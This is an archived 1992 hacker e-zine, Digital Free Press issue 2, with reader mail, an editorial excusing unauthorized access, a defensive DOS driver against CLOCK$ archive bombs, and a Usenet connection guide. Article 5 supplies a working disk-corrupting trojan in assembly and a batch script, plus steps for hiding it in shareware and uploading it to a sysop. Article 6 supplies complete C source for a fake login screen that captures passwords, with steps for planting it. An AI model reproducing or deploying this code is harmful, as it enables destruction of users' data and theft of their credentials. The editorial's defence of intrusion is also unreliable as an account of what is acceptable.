informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/DFP/dfp.002

1282 lines
54 KiB
Plaintext
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

######### ############ #########
########### ############ ###########
#### #### #### #### ####
#### #### #### #### ####
#### #### ######## ###########
#### #### ######## #########
#### #### #### ####
#### #### #### ####
########### #### ####
######### #### ####
DIGITAL FREE PRESS
-------------------------------------------------------------------------------
Volume 1.0 Issue 2.0
-------------------------------------------------------------------------------
* A Publication of The Underground Computing Foundation (UCF) *
* Send Submissions to: hackers%underg@uunet.uu.net *
* Editor: Max Cray (max%underg@uunet.uu.net) *
* BBS: The Underground (401) 847-2603 (v.32) *
------------------------------------------------------------------------------
Statement of Purpose and Disclaimer
The Digital Free Press is an uncensored forum to document current
activities in and of the world of modern technology. It is published under the
premise that it is better to know, rather than not know, so no attempt is made
to hide any information no matter how dangerous it may be. Information is a
double edged sword. It is neither good nor bad, and can be used for either
good or bad. Warning: Some information in this document could be used for
illegal activities. Use at your own risk. Articles are the opinion of the
authors listed, and not of the editor (unless of course the editor wrote
it).
------------------------------------------------------------------------------
In this Issue:
1. Mail to Max
2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray
3. A Tour of The Underground Computing Foundation BBS - Max Cray
4. Protection of DOS Devices - GodNet Raider
5. Overwriting Trojan - The BBC
6. Breaches of Security - The Joker
7. Getting on Usenet - Max Cray
8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC
------------------------------------------------------------------------------
Mail to Max:
------------------------------------------------------------------------------
Date: Tue, 31 Dec 91 23:49:32 -0500
From: <Irate Upstream Sysadmin>
X-Mailer: Mail User's Shell (7.2.2 4/12/91)
To: underg!ccn
Subject: digital free press
While investigating a problem with the mail and uucp queues on my system I
discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue 1".
The majority of this message gave details for activities that I consider to
be either illegal or primarily malicious in nature. As such, I refuse to
have my computer system be involved in any way in the distribution of this
material. I realize that some people, perhaps including yourself, might
construe this action as restricting the freedom of the press but rest
assured that this is not the case. I am in no way usurping your rights to
say anything that you want to say, I am only refusing to help pay for it.
I will phone your system one last time to deliver this letter and then I
will sever the uucp link. If you wish to discuss this matter with me you
may call me either at work during the day or at home in the evening.
If I do not hear from you within two weeks I will return the unused portion
of your $50.
--
<Irate Upstream Sysadmin>
%% Can I be excused, my brain is full. **
--
[Editor's note: Lesson here is be sure you know your upstream sysadmin's
policy on distribution of controversial material. I was able to get the uucp
connection back, but only after agreeing not to distribute DFP anymore
through his site.]
----------------------------------------------------------------------------
Date: Thu, 2 Jan 92 20:39:09 CST
From: <Irate Pseudo Hacker>
To: max@underg
Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1
Newsgroups: alt.hackers
Organization: :noitazinagrO
You obviously have no idea about what alt.hackers is about, to refresh your
memory, enclosed is a copy of an article you should have read earlier, but
knowing your type, probably didn't. please note that it EXPLICITLY states
that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like to
call themselves "hackers". go back to WWIVnet or Celeritynet or whatever
pirate-net it is that people like you use nowadays, asshole.
[alt.hackers FAQ deleted]
P.S. Please do not post this type of material here again.
--
<Irate Pseudo Hacker>
--
[Editor's note: How can this person hope to influence people by being so
confrontational? In fact the response I got from the first issue of DFP was
about 90% positive, and there were many requests to be put on the mailing
list. Thanks for your support, and please keep the mail coming!]
------------------------------------------------------------------------------
------------------
| Article 2 of 8 | EDITORIAL
------------------
Real Hackers?
There is a lot of talk these days about how the word 'hacker' has been
redefined by the press. The theory is that the old hackers, as portrayed in
Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_,
were good and pure and this breed of hacker dramatized in the press is some
new evil non-hacker terrorist. This is nonsense.
According to the book, the hacker ethic(paraphrased) is as follows:
1. Access to computers should be unlimited and total.
2. All information should be free.
3. Mistrust Authority - Promote Decentralization.
4. Hackers should be judged by their hacking.
5. You can create art and beauty on a computer.
6. Computers can change your life for the better.
In pursuit of the hacker ethic these heroes performed various acts that
would not be looked upon favorably in today's anti-hacker society:
Used Equipment Without Authorization (Page 20)
----------------------------------------------
" So, without any authorization whatsoever, that is what Peter Sampson
set out to do, along with a few friends of his from an MIT organization
with a special interest in model railroading. It was a casual, unthinking
step into a science-fiction future, but that was typical of the way that
an odd subculture was pulling itself up by its bootstraps and growing to
underground prominence-to become a culture that would be the impolite,
unsanctioned soul of computerdom. It was among the first computer
hacker escapades of the Tech Model Railroad Club, or TMRC."
Phone Phreaked (Page 92)
------------------------
"He had programed some appropriate tones to come out of the speaker and
into the open receiver of the campus phone that sat in the Kluge room.
These tones made the phone system come to attention, so to speak, and
dance."
Modified Equipment Without Authorization (Page 96)
--------------------------------------------------
" Nelson thought that adding an 'add to memory' instruction would
improve the machine. It would take _months_, perhaps, to go through
channels to do it, and if he did it himself he would learn something
about the way the world worked. So one night Stewart Nelson spontaneously
convened the Midnight Computer Wiring Society."
Circumvented Password Systems (Page 417)
----------------------------------------
"Stallman broke the computer's encryption code and was able to get
to the protected file which held people's passwords. He started
sending people messages which would appear on screen when they
logged onto the system:
'I see you chose the password [such and such]. I suggest that
you switch to the password "carriage return." It's much
easier to type, and also it stands up to the principle that
there should be no passwords.'
'Eventually I got to the point where a fifth of all the users on
the machine had the Empty String password.' RMS later boasted.
Then the computer science laboratory installed a more sophisticated
password system on its other computer. This one was not so easy for
Stallman to crack. But Stallman was able to study the encryption
program, and as he later said, 'I discovered changing one word in
that program would cause it to print out your password on the system
console as part of the message that you were logging in.' Since
the 'system console' was visible to anyone walking by, and its
messages could easily be accessed by any terminal, or even printed
out in hard copy, Stallman's change allowed any password to be
routinely disseminated by anyone who cared to know it. He thought
the result 'amusing.'
Certainly these hackers were not anarchists who wanted only to destroy.
They had a personal code of ethics, the hacker ethic to base their behavior
on. In fact the modern hacker has his/her ethics intact. Compare the above
hacker ethic with the hacker ethic found in _Out of the Inner Circle_ by
Bill 'The Cracker' Landreth, a teenager arrested by the FBI (Page 18,60):
1. Never delete any information you can not easily restore.
2. Never leave any names on a computer.
3. Always try to obtain your own information.
The common denominator to these ethics systems are the respect for
technology, and the personal growth through free access and freedom of
information. Certainly the attitude towards private property is the same.
Accessing and using equipment that you do not own is okay as long as
you do not prevent those who own it from using it, or damage anything.
With respect to the hacker ethic the hackers mentioned in _Cyberpunk:
Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John
Markoff were in fact good hackers. If free access, and free information
were the law of the land would Kevin Mitnick have gone to jail? I do not
think so. Sure he got the source code for VMS, but is there any evidence
that he used this information for personal gain, or did he simply use the
information to improve his understanding of the VMS operating system?
Robert T. Morris's worm program was a clever hack. Of course he 'gronked'
it by programming the replication rate much too fast, but still there is no
evidence that he had any intention of doing harm to the system. It was simply
a computer experiment. Who owns the Internet? Is it some mysterious 'them'
or is it our net? If it is out net, then we should be able to try some stuff
on it, and to heck with 'them' if they can't take a joke.
Of course the German hackers are a different story. What they got in
trouble for was espionage, and not hacking, which is a breach of faith,
and is hacking for personal gain. However selling Minix to the KGB almost
makes it forgivable...
It is my contention that hackers did not change. Society changed, and it
changed for the worse. The environment the early hackers were working in
correctly viewed these activities as the desire to utilize technology in a
personal way. By definition hackers believe in the free access to computers
and to the freedom of information. If you do not believe in these principles
you are not a hacker, no matter how technologically capable you are. You
are probable just a tool for the greed society. Current bad mouthing of
hackers is simply snobbery. Rather than cracking down on the modern hacker, we
should reinforce the hacker ethic, a code of conduct not based upon greed and
lust for the almighty dollar, but instead for personal growth through the free
access of computers and information, and a respect for technology.
It is the humane thing to do.
------------------------------------------------------------------------------
------------------
| Article 3 of 8 |
------------------
A Tour of the Underground Computing Foundation BBS
by Max Cray
I have noticed a lot of people call The UCF BBS and are unable to find
the good stuff, so let me take the opportunity to point out a few of the
high spots. First of all it is connected to the Usenet. Your international
e-mail address would be <username>%underg@uunet.uu.net. With this address
you can subscribe to all the good stuff like Phrack and NIA. There is also
a mailing list: hackers%underg@uunet.uu.net. E-mail me if you want to be
included on the list.
You can participate in the Usenet newsgroups, of which alt-cud-digest
is a must. alt.dcom.telecom is an outstanding resource for those interested
in the telephone network. There is vast amounts of very technical information
that passes through on a daily basis. Far too much to read it all. Type
USENET at the prompt to see all the newsgroups. Type in the name of the group
you want, and then type the READ command. Type the number of the first
message you want to read. If you call often you will want to configure your
NEW message scan using the JOIN command. Type ? at the prompt to get help.
There is a more local network set up, which has a newsgroup called ri.cug.
This is the Rhode Island Computer Underground, and it contains info on the
local scene around here.
If you are interested in journals type INFO. I try to keep the latest
issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are
interested in back issues go into the files section and LOG into the directory
/public/text. You can view or download text philes here. There is also some
stuff of interest in the /public/hacks directory. The /public/comm directory
contains subdirectories for the WAFFLE philes, and UUPC philes that you may
need to connect to the UUCP network.
Sorry there are no codez as it is an information board and not a pirate
board.
------------------------------------------------------------------------------
------------------
| Article 4 of 8 |
------------------
-=[ Protection of DOS devices ]=-
-or-
/*******************************************/
/* Unarc, Unzip, Lha extract, and be merry */
/* for tomorrow we may lock. */
/*******************************************/
- written by -
GodNet Raider
- of -
The CyberUnderground
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
]----------------------------------------------------------------------------[
Introduction:
-------------
This phile is written in response to the practice of misusing using
MS-DOS devices (ie.. to make archive bombs). The following will explain the
problem and some of the possible solutions. Also included is an ASM source
that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type
device.
The problem:
------------
In a never ending attempt of OS designers to mask the inner workings
of system hardware, the idea of device drivers comes into play. A device
driver is basically an attempt to standardize I/O with the systems' hardware.
Thus allowing access to every thing from keyboards to CD ROMS without an
in depth knowledge of the physical hardware involved.
This ideal is valid and of great help in program development, yet when
the drivers are not well defined there is the tendency for them to cause
more harm then good. A case in point is the 'CLOCK$' device in MS-DOS.
'CLOCK$' is a driver designed to allow updating of the CMOS clock.
It passes data direct to the CMOS clock with out buffering or any attempt
at error checking. Thereby passing valid data as well as invalid. An with
no internal mechanism to detect an overflow condition/not sending EOF after
a read will tend to hang systems/knock out the date and time stored in the
CMOS clock. This problem has come of use to the hacker community.
Several methods of the assault have been:
1) Uploading 'CLOCK$.*' files to remote systems.
2) Using BBS archiveing utilities to create 'CLOCK$.*'
files for download.
3) Low level disk editing of archive files to rename files
in it to 'CLOCK$.*'
Some possible solutions:
------------------------
Of the solutions available none are complete. There are benefits and
disadvantages to each. Nor is the following a complete list, it is only
an attempt to discus some of the common ones.
Abstinence:
Not excepting/expanding archive files on ones system. This is
the most undesirable but most effective and is only listed
'for abstinence makes the heart grow fonder'.
Scanning archives:
Most archive programs come with a utility to view the files
stored in a given archive (lha v foobar.lzh). The only real
drawback is having to take the time to scan archives. This
does not protect from BBS's that create real time archives,
extract to check for virus batches (with out looking thought
the archive first), uploads of 'CLOCK$.*' files, and programs
that create and write to a 'CLOCK$.*' file.
Updating programs:
Getting new versions of programs that watch for 'CLOCK$.*' and
avoid creating/writing to said file is a problem in that you
must wait for the author to come up with the fix and have to
pay for the update. Another reason for software makers to
release code with their programs.
TSR protection programs:
Other than yet another drain on precious RAM and clock time.
Can only protect from programs that create files though
interrupts. Pipes and redirects may slip though the cracks.
LOW LEVEL disk editing of io.sys files:
Renaming the 'CLOCK$' device is a method that will protect on
all levels but may cause some programs to hang that use it.
Also to replace it is not easy for you must reedit the file
(without moving it). It should also be noted that the new name
MUST be the same size as the original (6 letters).
Creation of a new 'CLOCK$' device:
This offers the protection of the above method with out the
need of changing OS binary files and to allow/disallow the
ORIGINAL 'CLOCK$' device by editing the config.sys file
instead. One disadvantage is that update of the CMOS clock
though 'CLOCK$' is stoped. Yet the BIOS clock is still
accessible and the CMOS clock can be updated though the BIOS
setup routine or programs that write direct to CMOS. Source
for a simple null mask clock device driver is provided below
and can be use as a template to create your own 'CLOCK$'
replacement.
There are other solutions to this problem not listed here.
Clock$ null device Source Code:
-------------------------------
The following ASM code is for a DOS device driver that will replace
the existing 'CLOCK$' device when added to the config.sys file
(device=outclock.sys).
The key points of the device are:
1) The line - DW 8080h. This tells the device loader that
outclock wishes to replace the present clock device
with it's self. This will trap all internal calls and
to redirect any calls to the new driver.
2) The line - DB 'CLOCK$ '. This will setup the device
to trap external access though pipes, indirects, file
I/O, and IOCTL's.
3) The device strategy is to simply ignore all incoming
commands to the device (standard practice for the
'NUL' device).
This driver does not prevent access to the CMOS clock except though
the CLOCK$ device. So it will not effect the running of programs EXCEPT
those that try to update the CMOS clock though the this device.
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
CSEG segment public 'CODE'
org 0
assume CS:CSEG, DS:CSEG, ES:CSEG
DEVICE proc far
DD 0ffffffffh ;------------------------------;
DW 8080h ; The following 5 definitions ;
DW DEV_STRATEGY ; 18 (bytes) MUST be at offset ;
DW DEV_INTERRUPT ; 0 in the binary file. ;
DB 'CLOCK$ ' ;------------------------------;
KEEP_ES DW ?
KEEP_BX DW ?
FUNCTIONS label word
DW INIT
DW CHK_MEDIA
DW MAKE_BPB
DW IOCTL_IN
DW INPUT_DATA
DW NONDSTRCT_IN
DW INPUT_STATUS
DW CLEAR_INPUT
DW OUTPUT_DATA
DW OUTPUT_VERIFY
DW OUTPUT_STATUS
DW CLEAR_OUTPUT
DW IOCTL_OUT
DEV_STRATEGY:
mov CS:KEEP_ES, ES
mov CS:KEEP_BX, BX
ret
DEV_INTERRUPT:
push ES
push DS
push AX
push BX
push CX
push DX
push SI
push DI
push BP
mov AX, CS:KEEP_ES
mov ES, AX
mov BX, CS:KEEP_BX
mov ES:word ptr [BX] + 3, 0000h
mov AL, ES:[BX] + 2
shl AL, 1
xor AH, AH
lea DI, FUNCTIONS
add DI, AX
jmp word ptr [DI]
INIT:
lea AX, E_O_P
mov ES:word ptr [BX] + 14, AX
mov ES:word ptr [BX] + 16, CS
jmp short QUIT
INPUT_STATUS:
KEY_READY:
NONDSTRCT_IN:
INPUT_DATA:
OUTPUT_DATA:
OUTPUT_VERIFY:
CHK_MEDIA:
MAKE_BPB:
IOCTL_IN:
IOCTL_OUT:
OUTPUT_STATUS:
CLEAR_OUTPUT:
CLEAR_INPUT:
QUIT:
or ES:word ptr [BX] + 3, 0100h
pop BP
pop DI
pop SI
pop DX
pop CX
pop BX
pop AX
pop DS
pop ES
ret
E_O_P:
DEVICE endp
CSEG ends
end DEVICE
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
]============================================================================[
underg!tsf!gnr@uunet.uu.net (GodNet Raider)
-=[ "You gotta learn to listen, before you learn to play." ]=-
------------------------------------------------------------------------------
------------------
| Article 5 of 8 |
------------------
To: hackers@underg.UUCP
Subject: Text phile 2
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground
Welcome class... An now... for another lesson in the misuse of
computers...
So you thought that INJECT.BAT was fun... But you did not like
the idea of making the injection give the fun away by causing the
host program to crash after the trojan ran... Well then lets get a
little more sophisticated then... Now rather than overwriting the
existing host code lets just... Oooooh... Say... Add a new function
to an existing program... Now what to add... Something
destructive???? Why not...
Ok How about a bit o' code that just moves the absolute disk
write interrupt to the clock interrupt... Then each time the clock
ticks (about 18 times a second) the computer attempts a disk write
with random data... Good way to test THOSE ol' ALT-CTRL-DEL
reflexes... Oooooh... What fun, it is to crash, in a one drive
nonbacked-up system...
Well now for the fun part...
Step 1:
Make a batch file called "ADDON.BAT" an in it place
the following commands -
=============================================================
echo off
cls
rename %2 temp2.tp > nul
copy %1+temp2.tp %2 /b > nul
erase temp2.tp > nul
=============================================================
Step 2:
Make a ASM file called "TROJAN.ASM" an in it place the
following -
=============================================================
PROGSEG segment para public 'CODE'
assume CS:PROGSEG
DOIT proc
wSaveDS dw 9090h ; Store old DS register here...
mov AX, DS
mov CS:wSaveDS, AX ; Save DS address for hosts'
; use...
;-------------- v Place Trojan Here v -------------;
mov AX, 3526h ; Get DOS absolute write interrupt...
int 21h
mov DX, BX ; Set clock interrupt to returned
; value...
mov AX, ES
mov DS, AX
mov AX, 2508h
int 21h
xor BX, BX ; Rezap used registers [other than
; AX/DS/ES]...
xor CX, CX
xor DX, DX
;--------------- ~ Place Trojan Here ~ ------------;
mov AX, CS:wSaveDS ; Restore DS, ES registers for
; host...
mov DS, AX
mov ES, AX
xor AX, AX
DOIT endp ; Host will start after this
; point...
PROGSEG ends
end
=============================================================
Step 3:
Then assemble and link the trojan file. Use exe2bin [or
whatever utility you have to convert .EXEs to .COM format]
to make a .COM file out of TROJAN.EXE.....
Step 4:
Then copy a *.COM file into the same directory. Should
be part of some shareware thing that the target sysop would
like. With docs an all... would not want them to get
suspicious, now would we.............
Step 5:
Run the following command from the dos prompt...
ADDON <Trojan file> <COM file to add trojan to>
Step 6:
Upload the mess to the unsuspecting sysop and watch the fun!
See and you thought hacking was hard...... Of course if they
get smug and start searching for the added code.... We'll just have
to add extra code (nops' ect) and/or switching some of the code
around in the ASM file...
'Another fine mess' from...
The BBC
---------------------------------------------------------------------
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
-=[ "Anarchy is never HAVING to say you're sorry." ]=-
------------------------------------------------------------------------------
------------------
| Article 6 of 8 |
------------------
Breaches of Security
by
The Joker
----------------------
Hello loves, Here we are with yet another page from the _Tomb of
Ultimate Evil_ (THOSE of good aliment must make a saving throw against
neophytedom).
Todays chat is on the subject of collecting passwords, not that anyone
here would have nothing but nobel reasons to do such a thing. An in
this wonderfully wacky world of networks, UNIX, and VMS it's just the in
t'ing to do. So now boys and girls, hacks and hacketts, Rocky and
bullwinkel let us begin.
Ah, what a tangled web we weave when first we practice to deceive...
Yet how easy it makes it to get what we want. An deception is the key
here. For thanks to the simple format of most logins (name, password...
rank, serial number, underwear condition...). The simplicity of the answer
makes it a wonderful little exercise in shell programming.
What is needed is a simple program that pretends it's a login shell
and is set like a little program beartrap. Sitting quietly, waiting
for that most elusive of pray... The north american password! (An them's
good eating too). So as we send our assistant into the system to wrestle
and subdue the foul beasty, let us listen to a message from the good folks
at Mutual of Omaha... Ooop sorry, instead let us look at a model of a simple
password capture shell. What? You want the insurance commercial instead...
Well, tough cookies.
|------------------------------[ Cut Line ]----------------------------------|
/*
LogTrap.c
(c) 1992 by Joculator inc., no rights reserved (or respected).
Rubber cell #182
Arkham Asylum
Gotham City
Captures first login attempt by a user, to file (*szKeepFile),
then give phony error (*szPhonyError) and call real login shell
(*aszRealShell []). For the express purpose of promoting glorious
world chaos.
*/
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#define TRUE 1
#define MAX_BUFFER 256
#define ECHO 0
#define NOECHO 1
#define NEWLINE "\n"
#define ANSI_CLS "\x1b[2J"
#define ANSI_NOECHO "\x1b[8m \x1b[40D"
#define ANSI_ECHO "\x1b[0m"
struct
{
char
*szPrompt,
fNoEcho;
} *ptPrompts,
Prompts [] = /* Prompts patterned after real login shell. */
{
/* [Prompt string], [ECHO | NOECHO] */
"Login: " , ECHO,
"Password: " , NOECHO,
NULL
};
char
*szPhonyError = "Invalid login.\n", /* Error patterned after LOGIN. */
*aszRealShell [] = /* Command to call real LOGIN. */
{
"LOGIN",
/* list parameters (if any) here */
NULL
},
*szKeepFile = "tmp0167.tmp", /* Save booty in... */
szWorkBuffer [MAX_BUFFER];
void
main (void);
void main (void)
{
FILE
*OutStream;
/* Cover our tracks. */
printf (ANSI_CLS);
/* Prompt for and save user information. */
for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++)
{
printf (ptPrompts->szPrompt);
if (ptPrompts->fNoEcho)
printf (ANSI_NOECHO);
fgets (szWorkBuffer, MAX_BUFFER, stdin);
if (ptPrompts->fNoEcho)
printf (ANSI_ECHO);
/* If file error, ignore it but, don't try to write to file. */
if (OutStream = fopen (szKeepFile, "a"))
{
fputs (ptPrompts->szPrompt, OutStream);
fputs (szWorkBuffer, OutStream);
}
fclose (OutStream);
}
/* Stick tongue out, Naaaa... */
printf (szPhonyError);
/* Commit process suicide by running LOGIN shell on top of our process. */
/* It should not return (unlike a bad check). */
execvp (aszRealShell [0], &aszRealShell [1]);
/* if execvp () (it got to this point?), lock system. */
while (TRUE);
}
|------------------------------[ Cut Line ]----------------------------------|
So there you have it. Now all that is left to do is:
1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the
LOGIN of the target system.
2: Set *szKeepFile to where you want your ill gotten booty to go.
3: Compile the whole mess.
4: LOGIN to the target system and run the program. For more fun
place copies on more than one terminal, if possible, on the same
system.
5: Run to your duck blind and wait for a user to spring your lil'
trap.
That's it, have fun, And remember...
If someone offers you drugs, just say... Yo!
----------------------------------------------------------------------
...uunet!rayssd!galaxia!underg!tsf!joker (The Joker)
-=[ "All it takes is one bad day, then maddness has its way." ]=-
------------------------------------------------------------------------------
------------------
| Article 7 of 8 |
------------------
Getting on Usenet
by Max Cray
Much of the information from this phile comes from the excellent text
phile INTRO.DOC that comes with the Waffle BBS package. Other information
was gained from various books, and postings on the net itself, especially
the FAQs (Frequently Asked Questions) postings in news.answers, and also my
personal experience.
Before you actually connect your machine to Usenet, it may be easier
for you to learn about Usenet, and what it can do for you, by calling a
BBS that is connected to Usenet. Good choices would be my own Underground,
or any of the systems listed in the *nixpub. This is a document regularly
posted to the Usenet listing all known unix bbs systems. You can get a copy
of this from my bbs or from the following sources:
o anonymous uucp from jabber.
+1 215 348 9727 [Telebit access]
LOGIN: nuucp NO PWD [no rmail permitted]
this list: /usr/spool/uucppublic/nixpub.short
long list: /usr/spool/uucppublic/nixpub
o "*NIX Depot" BBS on jabber.
o USENET, regular posts to:
comp.misc
alt.bbs
o the nixpub electronic mailing list.
to be included or deleted from this distribution,
send mail to nixpub-list-request@ls.com.
o anonymous ftp from GVL.Unisys.COM [128.126.220.102]
under /pub/nixpub/{long,short}
o archive server from cs.widener.edu.
mail to archive-server@cs.widener.edu
Subject: or body of
send nixpub long
or
send nixpub short
or
send nixpub long short
or even
index nixpub
I will talk more about anonymous uucp, mailing lists, and archive servers
in a minute.
UUCP SOFTWARE
The first thing you need to connect your machine to the Usenet is
software, and the first choice would be a version of the unix operating system
itself. In fact to get a copy of the real thing is not that expensive anymore.
As of this writing Consensys Corporation (1301 Pat Booker Rd., Universal City,
TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the latest) including
C development, Networking, and X Windows, for 386+ systems for $495. Certainly
a big chunk of change, but a great deal for what you get. If cost is important
you might try Coherent by Mark Williams Company (60 Revere Dr., Northbrook,
IL. 60062, 1-800-627-5967). This is a less robust unix clone os that should
run on any pc compatible computer. The price is right at $100. If you just
want uucp connectivity, but you don't want to switch to a real operating
system, then you might want to check out the Waffle BBS package. It can be
found at SIMTEL, UUNET, or also can be gotten from the source: darkside.com
BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from The Underground
BBS. The package does not need to be run as a bbs, but can also be run as a
personal system, and it is shareware. If you want freeware, then you might be
interested in UUPC which can also be gotten from SIMTEL, UUNET, or from my
bbs. Source code is available.
Once you have software, read and re-read the docs. Get a friend to connect
with you and learn how to use your software before you bother a sysadmin with
connecting to Usenet proper.
CONNECTING TO USENET
And now the hard part: you need to find someone to feed you. Mail feeds
are usually not too difficult, but newsfeeds are harder to come by as they
take more resources from the host machine than mail feeds due to the much
larger volume of information. Possible sources of feeds include:
- Systems on the previously mentioned *nixpub listing.
- Local colleges or universities.
- Systems found scanning the uucp maps.
These can be gotten using anonymous uucp from UUNET, or also from
the mail server at MIT. You can request an index of the maps by
sending email to 'mail-server@pit-manager.mit.edu' with this message:
path <your-site@address>
send usenet/comp.mail.maps/index
quit
You can get help for this mail server by replacing the 'send' line
with just 'help'. You can see how being on the net already helps you
to get your machine on the net. The uucp maps are also an excellent
hackers tool as they list the sites in your area, points of contact,
and how they connect up to each other (at least for uucp connections).
I believe older copies of the uucp maps can be found in the TELECOM
or UNIX forums on Compuserve.
- Pay services.
Here are some of the providers:
o Anterior Technology
P.O. Box 1206
Menlo Park, CA 94026-1206
Voice: (415) 328-5615
info@fernwood.mpk.ca.us
(UUCP, connectivity, name service, MX forwarding, news feeds)
o CERFnet
P.O. Box 85608
San Diego, CA 92186-9784
Voice: (800) 876-CERF
help@cerf.net
(connectivity, name service, MX forwarding, news feeds)
o Colorado SuperNet, Inc.
Attn: David C. Menges
Colorado School of Mines
1500 Illinois
Golden, CO 80401
Voice: 303-273-3471
dcm@csn.org
(UUCP, news feeds)
o MSEN, Inc.
628 Brooks Street
Ann Arbor, MI 48103
Voice: (313) 741-1120
info@msen.com
(UUCP, connectivity, name service, MX forwarding, news feeds)
o MV Communications, Inc.
P.O. Box 4963
Manchester, NH 03108-4963
Voice: (603) 429-2223
Data: (603) 429-1735 (log in as "info" or "rates")
info@mv.mv.com
(UUCP, name service, MX forwarding, news feeds)
o NEARnet
Attn: John Curran
BBN Systems and Technologies
MS 6/3B
10 Moulton Street
Cambridge, MA 02138
Voice: (617) 873-8730
jcurran@nic.near.net
(connectivity, name service, MX forwarding, news feeds (for
NEARnet sites))
o Netcom - Online Communication Services
P.O. Box 20774
San Jose, CA 95160
Voice: (408) 554-8649
bobr@netcom.com
(UUCP, connectivity, name service, MX forwarding, news feeds)
o SURAnet
8400 Baltimore Blvd.
College Park, MD 20742
Voice: (301) 982-3214
news-admin@sura.net
(connectivity, name service (for SURAnet sites), news feeds (for
SURAnet sites))
o UUNET Canada, Inc.
1 Yonge St., Suite 1801
Toronto, Ontario
Canada M5E 1W7
Voice: (416) 368-6621
info@uunet.ca or uunet-ca@uunet.uu.net
(UUCP, connectivity, name service, MX forwarding, news feeds)
o UUNET Technologies Inc.
3110 Fairview Park Drive, Suite 570
Falls Church, VA 22042
Voice: (703) 876-5050
info@uunet.uu.net
AlterNet (network connectivity) info: alternet-info@uunet.uu.net
(UUCP, connectivity, name service, MX forwarding, news feeds)
o UUNORTH, Inc.
Box 445, Station E
Toronto, Ontario
Canada M6H 4E3
Voice: (416) 537-4930 or (416) 225-UNIX
o Performance Systems International, Inc.
11800 Sunrise Valley Drive, Suite 1100
Reston, VA 22091
Voice: (703) 620-6651 or (800) 827-7482
Computerized info: all-info@psi.com
Human-based info: info@psi.com
(UUCP, connectivity, name service, MX forwarding, news feeds)
SUBMIT A UUCP MAP ENTRY
All machines connecting to the UUCP network should submit
a UUCP map to the map coordinator, <uucpmap@rutgers.edu>. The
purpose of these maps is to facilitate finding the fastest
path between any two systems, and also to prevent duplicate
names that would cause mail to be lost.
Maps are posted to comp.mail.maps newsgroup on a fairly
regular basis. In addition to the maps, there is a README file
that documents these details in much more detail -- the
information here is not enough to construct a full map entry.
You should obtain this README file from one of your neighbors;
it is also available on the waffle BBS system +1 408 245 SPAM (as
the file /public/waffle/uucp-map.txt), or it can be found in the
/public/text/misc directory on The Underground BBS.
The basic format of the maps consists of a number of lines
with a # and a letter, followed by a tab and then information
corresponding to that letter:
#N UUCP name of site
#S manufacturer machine model; operating system & version
#O organization name
#C contact person's name
#E contact person's electronic mail address
#T contact person's telephone number
#P organization's address
#L latitude / longitude
#R remarks
#U netnews neighbors
#W who last edited the entry ; date edited
#
sitename .domain
sitename remote1(FREQUENCY), remote2(FREQUENCY),
remote3(FREQUENCY)
ARCHIVE SERVERS
There are many archive servers. These systems provide files via e-mail.
For example the pit-manager mail server at MIT mentioned above is one. You
can get back issues of the Computer Underground Digest from the University
of Chicago archive server. To use the U. of Chicago email server, send mail
with the subject "help" (without the quotes) to:
archive-server@chsun1.spc.uchicago.edu.
There are many more archive servers. You can also get binaries using a
pair of utilities called uuencode, and uudecode. These utilities convert
binary code to ascii text code suitable for transmission via e-mail (or to be
posted on when of the many .binaries newsgroups on Usenet.
MAILING LISTS
Once you have an e-mail account you can join mailing lists. These can be
the electronic equivalent of the newsletters, or they can echo mail to
multiple destinations. For example you mail a certain mail list, and copies
will be echoed to all who are on the list. For example you can sign up for
the Phrack electronic P/H newsletter by:
1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The mail
must be sent from the account where you wish Phrack to be delivered.
2. Leave the "Subject:" field of that letter empty.
3. The first line of your mail message should read:
SUBSCRIBE PHRACK <your name here>
4. DO NOT leave your address in the name field!
(This field is for PHRACK STAFF use only, so please use a full name)
Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com.
Incidentally, you do not have to be part of the Usenet, ot the Internet
(the TCP/IP network), to participate. See the excellent article in NIA73
about e-mail gateways between networks "Internet to Anywhere" by Industrial
Phreak.
I should also mention that with a mail account, you can still post to
a Usenet newsgroup. Send mail to <newsgroup>@ucbvax.berkeley.edu. For
newsgroup you want to change any periods to dashes. For example,
alt-bbs@ucbvax.berkley.edu to post to the alt.bbs newsgroup. If you desire
a response to your posting be sure to put in a line like: Please e-mail all
replies.
USING UUCP TO TRANSFER FILES
The uucp program allows files to be transmitted to and from
any neighboring system, via the command line.
To "push" a file from the local machine to the remote machine:
uucp filename.here unix!/filename.there
To "pull" a file into a machine off the remote machine:
uucp unix!/filename.there filename.here
unix is used here as the name of the remote machine.
For example you can connect to the uunet machine directly via
a 1-900 number, and get access to a wealth of source code and
information about the network. Call 1-900-468-7727 and use the login
"uucp" with no password. Callers are charged 50 cents per minute.
The charges appear on your phone bill.
The file uunet!/help contains instructions. The file
uunet!/ls-lR.Z contains a complete list of the files available
and is updated daily. Files ending in Z need to be uncompressed
before being used. The file uunet!/compress.tar is a tar
archive containing the C sources for the uncompress program.
1. How to reach UUNET's 900 number via uucp
Here are some sample a L.sys or Systems file lines suitable for
UUNET's 900 number:
# Simple line.
uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp
#
